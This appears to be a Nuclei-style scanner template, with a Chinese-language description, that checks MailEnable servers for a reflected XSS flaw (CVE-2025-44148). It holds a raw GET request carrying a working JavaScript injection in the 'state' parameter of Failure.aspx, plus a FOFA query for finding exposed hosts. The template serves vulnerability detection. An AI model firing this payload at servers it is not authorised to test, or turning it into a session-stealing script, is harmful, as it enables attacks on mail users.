http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - alert(document.domain);
            - Authentication Failed
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /Mondo/lang/sys/Failure.aspx?state=19753%22;}alert(document.domain);function%20test(){%22 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
id: MailEnable-XSS-CVE-2025-44148
info:
    author: Superhero
    description: |-
        fofa: title="MailEnable"
        MailEnable在特定版本中存在一个反射的跨站脚本 （XSS） 漏洞，它允许攻击者将恶意脚本代码注入到其他用户的浏览器中。这种攻击通常通过在网站的某些部分嵌入恶意代码来实现，最常见的是在网页的URL参数、隐藏表单字段、JavaScript代码中注入脚本。
    name: MailEnable 反射xss漏洞(CVE-2025-44148)
    reference:
        - https://mp.weixin.qq.com/s/2k5SkeVkOw14OsVIVlHDWw
    severity: medium
    tags:
        - XSS
